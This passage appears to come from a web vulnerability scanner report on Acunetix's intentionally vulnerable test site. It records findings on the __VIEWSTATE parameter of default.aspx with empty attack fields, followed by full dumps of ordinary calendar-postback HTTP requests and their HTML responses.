style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8292&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAMxHkldoIZGRktp04mzxOPBggx6eV2v9fJcTiXTo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLQxIKuBwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApqTweND8%2FRvXhqtLaftci4cq5YZ
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:26:28 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAMxHkldoIZGRktp04mzxOPBggx6eV2v9fJcTiXTo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLQxIKuBwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgApqTweND8/RvXhqtLaftci4cq5YZ" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:White" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1179 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,179 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8280&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAPhR2jNoIZGRkDD0MGhfGdKbpZ3wym9XSgphN8N0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKJ9teOBwLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAt1JSDN8Z0viiOGr49yiHNKsK5f5
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:52:49 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgBAPhR2jNoIZGRkDD0MGhfGdKbpZ3wym9XSgphN8N0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKJ9teOBwLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAt1JSDN8Z0viiOGr49yiHNKsK5f5" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:White" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" 